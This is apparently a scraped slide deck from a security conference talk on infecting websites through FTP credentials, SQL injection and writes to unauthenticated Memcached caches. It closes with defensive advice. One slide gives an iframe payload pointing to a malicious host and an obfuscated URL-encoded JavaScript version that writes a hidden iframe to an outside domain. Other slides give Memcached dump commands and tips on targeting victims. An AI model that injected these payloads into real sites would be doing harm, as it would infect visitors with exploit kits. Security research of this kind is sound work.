[FTP|SQL|Cache] Injections
2 likes3,622 views
This document discusses techniques for infecting websites through cache injection attacks. It describes how an attacker can compromise a website by injecting an iframe or JavaScript that redirects visitors to a controlled webpage. It provides examples using Memcached, an unauthenticated caching system, to overwrite cache values with malicious content like iFrames linking to infection kits. The document demonstrates password sniffing and manipulating cached price data as potential attacks. It notes that while no public infections using these techniques have been seen, caching systems like Memcached that listen publicly pose an attractive target for attackers.
![[FTP|SQL|Cache]
Injections
David Barroso
Head of Security Intelligence
Telefonica Digital](https://image.slidesharecdn.com/injections-130103025135-phpapp01/85/FTP-SQL-Cache-Injections-1-320.jpg)
![[FTP|SQL|Cache] Injections](https://image.slidesharecdn.com/injections-130103025135-phpapp01/85/FTP-SQL-Cache-Injections-35-320.jpg)
[FTP|SQL|Cache] Injections
- 1. [FTP|SQL|Cache] Injections David Barroso Head of Security Intelligence Telefonica Digital
- 2. ddddddasdfsdf 27% 73% http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html
- 4. How can I infect a web? Or, how can I forward visitors to a controlled webpage? Pág. 4
- 5. MPack The attacker compromises a Attacker website and injects The malcode an iFrame connects back to the C&C C&C iFRAME Infection kit Servidor Web legítimo www.mydomain.com) The visitor is forwarded to an infection kit The visitor browses a normal website (with User a malicious iframe) Pág. 5
- 6. First option Difficulty: easy Pág. 6
- 7. Pág. 7
- 8. Pág. 8
- 9. SQL Injection Difficulty: easy Pág. 9
- 10. Pág. 10
- 11. Pág. 11
- 12. Pág. 12
- 13. Pág. 13
- 14. A tener en cuenta Which users do I want to infect? Focus your efforts Example: brazilian webpages SEO and web ranking Alexa Ranking It’s not only about infection Sometimes is only about web ranking Spam comments in blogs Playing with HTML entities(ex. <noscript>) Pág. 14 Pág. 14
- 15. Second options Difficulty: medium Pág. 15
- 16. Pág. 16
- 17. Pág. 17
- 18. Pág. 18
- 19. Pág. 19
- 20. Pág. 20
- 21. Pág. 21
- 22. Choose your preferred infection kit 99% LAMP: Linux + Apache + Mysql + PHP Pág. 22
- 23. Pág. 23
- 24. Pág. 24
- 25. Pág. 25
- 26. Pág. 26
- 27. Pág. 27
- 28. ddddddasdfsdf Simple: <iframe src=‘http://www.malicious.com’></iframe> Not so simple: <Script Language='Javascript'> 27% document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%6 73% 3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65% 61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D %38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67 %68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6 C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F% 6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D %65%3E')); </Script>
- 29. And how a web cache is related? Specifically: memcached Pág. 29
- 30. ddddddasdfsdf Cache A component that transparently stores data so that future requests for that data can be served faster. The data that is stored within a cache might be values that have been computed earlier or duplicates of original values that are stored27% elsewhere. (Wikipedia) 73% Examples: CPU, Disk, DNS, ARP, etc. Main security attack: poisoning
- 31. ddddddasdfsdf 73% 27%
- 32. ddddddasdfsdf Created on 2003 forLiveJournal Associative array(hash table) YouTube, Reddit, FaceBook, Orange, Twitter, etc. 27% Memory-based Keys (250b), Values (1MB) 73% Default port: 11211/tcp No authentication Some caches are on the Internet Optional(not often used): SASL
- 33. ddddddasdfsdf Telnet based commands Commands Set (flags timeout bytes) Get Stats 27% Items Cachedump 73%
- 34. ddddddasdfsdf Sensepost analyzed the security issues back on 2010 They developed go-derper.rb Identifcation Storage of k keys and values Regular expressiones 27% It can overwrite existing keys and values 73% Main problems Which web app is using these data? How can I find ‘interesting’ data?
- 37. Let’s see some practical stuff Take care with all those memcached! Pág. 37
- 38. ddddddasdfsdf Demo Memcached access 27% Key/value storage 73%
- 39. ddddddasdfsdf set FIRST 0 0 11 Hello FIRST get FIRST stats items 27% stats cachedump n 10 73%
- 40. ddddddasdfsdf Demo Overwriting values 27% (iFrame – infection kit) 73%
- 41. ddddddasdfsdf iFrame injection 27% 73%
- 42. ddddddasdfsdf Demo Password sniffing 27% Data mangling (prices) 73%
- 43. ddddddasdfsdf Password sniffing 27% 73%
- 44. ddddddasdfsdf Data mangling (prices) 27% 73%
- 45. ddddddasdfsdf Data mangling (prices) 27% 73%
- 46. ddddddasdfsdf 27% 73% Source: http://www.sensepost.com/blog/4873.html
- 47. ddddddasdfsdf CacheT: an alternative to FTP-Toolz and SQL Injection Kitz go-derper.rb patch Proof of concept 27% Once you find some memcached hosts(nmap) 73% entries Dump of all their Look for HTML data Malicious injection (iFrame/JavaScript) Not published yet (only malicious purposes)
- 48. ddddddasdfsdf Protect your memcached from external access Firewall Listen only to localhost We haven’t seen malicious infections using theses caches But it’s a very attractive asset, because many of the large 27% websites are using it From the malicious point of view, it doesn’t mind if you don’t 73% know which webapp is behind It’s very easy to code a tool scanning for open memcached (or similar caches) and then infect all of them nmap + go-derper.rb
- 49. Obrigado David Barroso @lostinsecurity